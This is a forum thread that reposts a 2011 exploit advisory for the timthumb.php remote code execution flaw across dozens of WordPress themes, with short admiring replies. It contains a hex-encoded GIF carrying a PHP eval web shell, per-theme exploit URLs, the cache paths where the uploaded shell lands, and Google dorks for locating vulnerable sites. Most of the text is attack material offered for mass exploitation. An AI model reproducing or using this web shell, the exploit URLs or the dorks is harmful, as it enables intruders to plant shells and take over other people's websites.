Multiple WordPress Themes timthumb.php Vulnerabilites

[tempe_mendoan]

[quote]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit Title: Multiple WordPress Themes timthumb.php Vulnerabilites
# Date: 23 September 2011
# Author: tempe_mendoan
# Home : Mbuh Ra Ngerti Golek Dewek
# Version: 1.32 (Only version 1.19 and 1.32 were tested.)
# Tested on: Windows XP Bajakan

Reference:

WordPress TimThumb Plugin - Remote Code Execution
Multiple Wordpress Plugin timthumb.php Vulnerabilites

Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
- Ben Schmidt

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/...$src);
1.32: http://www.target.tld/wp-content/themes/...$src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_____________________________________________________________________________

POC :
http://website/wp-content/themes/SimplePress/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/SimplePress/cache/md5($src);

[~] Google Dork : /wp-content/themes/SimplePress/
[~] Software Link : http://www.elegantthemes.com/gallery/simplepress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/sportpress/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/sportpress/scripts/cache/md5($src);

[~] Google Dork : /wp-content/themes/sportpress/
[~] Software Link : http://www.wpzoom.com/themes/sportpress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/skeptical/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/skeptical/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/skeptical/
[~] Software Link : http://www.wpmods.com/skeptical-wordpress-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/TheCorporation/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/TheCorporation/cache/md5($src);

[~] Google Dork : /wp-content/themes/TheCorporation/
[~] Software Link : http://www.premiumwp.com/the-corporation...ess-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/themorningafter/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/themorningafter/cache/md5($src);

[~] Google Dork : /wp-content/themes/themorningafter/
[~] Software Link : http://www.bestwpthemes.com/the-morning-after/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/magazinum/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/magazinum/scripts/cache/md5($src);

[~] Google Dork : /wp-content/themes/magazinum/
[~] Software Link : http://www.wpzoom.com/themes/magazinum/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/thestation/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/thestation/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/thestation/
[~] Software Link : http://www.premiumwp.com/the-station-ver...ess-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/newswp/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/newswp/scripts/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/newswp/
[~] Software Link : http://monstrtemplaite.tk/news-wp-themes-download.html
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/epsilon/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/epsilon/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/epsilon/
[~] Software Link : http://topwpthemes.com/epsilon/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/viroshop/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/viroshop/cache/external_md5($src);
/wp-content/themes/viroshop/temp/md5($src);

[~] Google Dork : /wp-content/themes/viroshop/
[~] Software Link : http://www.prowordpress.net/premium-word...ess-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/eVid/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/eVid/temp/md5($src);

[~] Google Dork : /wp-content/themes/eVid/
[~] Software Link : http://wpthemesdownload.net/download-evi...antthemes/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/versatile/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/versatile/cache/md5($src);

[~] Google Dork : /wp-content/themes/versatile/
[~] Software Link : http://themeforest.net/item/versatile-pr...eme/150471
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/cadabrapress/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/cadabrapress/scripts/cache/md5($src);

[~] Google Dork : /wp-content/themes/cadabrapress/
[~] Software Link : http://www.wpzoom.com/themes/cadabrapress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/rt_infuse_wp/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/rt_infuse_wp/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/rt_infuse_wp/
[~] Software Link : http://www.rockettheme.com/wordpress-upd...e-released
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Memoir/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Memoir/cache/md5($src);
/wp-content/themes/Memoir/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/Memoir/
[~] Software Link : http://wpthemesdownload.net/memoir-theme...antthemes/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/kingsize/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/kingsize/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/kingsize/
[~] Software Link : http://www.newwordpresstheme.net/2011/08...oad-2.html
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/SimplePress/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/SimplePress/cache/md5($src);

[~] Google Dork : /wp-content/themes/SimplePress/
[~] Software Link : http://www.elegantthemes.com/gallery/simplepress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/elegantestate/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/elegantestate/cache/md5($src);

[~] Google Dork : /wp-content/themes/elegantestate/
[~] Software Link : http://wpthemesdownload.net/download-ele...ress-free/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Glow/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Glow/temp/md5($src);

[~] Google Dork : /wp-content/themes/Glow/
[~] Software Link : http://www.elegantthemes.com/gallery/glow/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/OptimizePress/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/OptimizePress/cache/md5($src);

[~] Google Dork : /wp-content/themes/OptimizePress/
[~] Software Link : http://www.famousbloggers.net/optimizepr...-page.html
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Modest/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Modest/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/Modest/
[~] Software Link : http://www.elegantthemes.com/gallery/modest/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/LightBright/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/LightBright/temp/md5($src);

[~] Google Dork : /wp-content/themes/LightBright/
[~] Software Link : http://www.elegantthemes.com/gallery/lightbright/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Glider/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Glider/temp/md5($src);

[~] Google Dork : /wp-content/themes/Glider/
[~] Software Link : http://www.elegantthemes.com/gallery/glider/
_____________________________________________________________________________
_____________________________________________________________________________

Note :

And All bug Themes timthumb.php in Google .. See You !!
_____________________________________________________________________________


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks To :

[-] MaXe
[-] millo , arif , skygers , rasdam , aury ( onetcr3w )
[-] kangkung , bjork , Cavalera , van_java , Satria , Daviz , ArRay And All Byroe Net IRc Team
[-] tukulesto , yurakh4 , xr0b0t , falcon , chaer.newbie , wenkhairu , tabun , tridi , mboys , jundab , nakula
[-] mas boy , arianom , mboys , kodok maho , hakz , vyc0d , ketek bang udin And all my Friends
[-] My Best Friend : r3m1ck, El-Farhatz, kaMtiEz, Adeyonatan

Special To :

[-] kang zaki_22 suwun yo kang di ajari bingung wae suramz =))

[-] my love dyla semoga cepat sembuh sayangku :*



Tutor Visit :
Thread + VIdeo

[nuxbie_cyber]

Cek your email...

God Job...

Your Exploits:
http://www.thecybernuxbie.com/exploits-r...rabilites/

http://www.thecybernuxbie.com/private_ar...e_mendoan/

[Wayc0de]

pdhl ane baru tadi liat nie disumbernya (ato salah liat ea)

skrg dh disini j

thanks om tempe

[tian hv]

om
TKP dolo ya

[adoet_t]

ajib,, premium theme banyak kena,,

[anko_kum4ru]

omz tempe emang keyeennn...

[ohara_inamiji]

cool kk

[tridi]

sedikit bingung aku dg ginian..

[Initial-d]

Gila!
Banyak amir themes yg kena
THX infox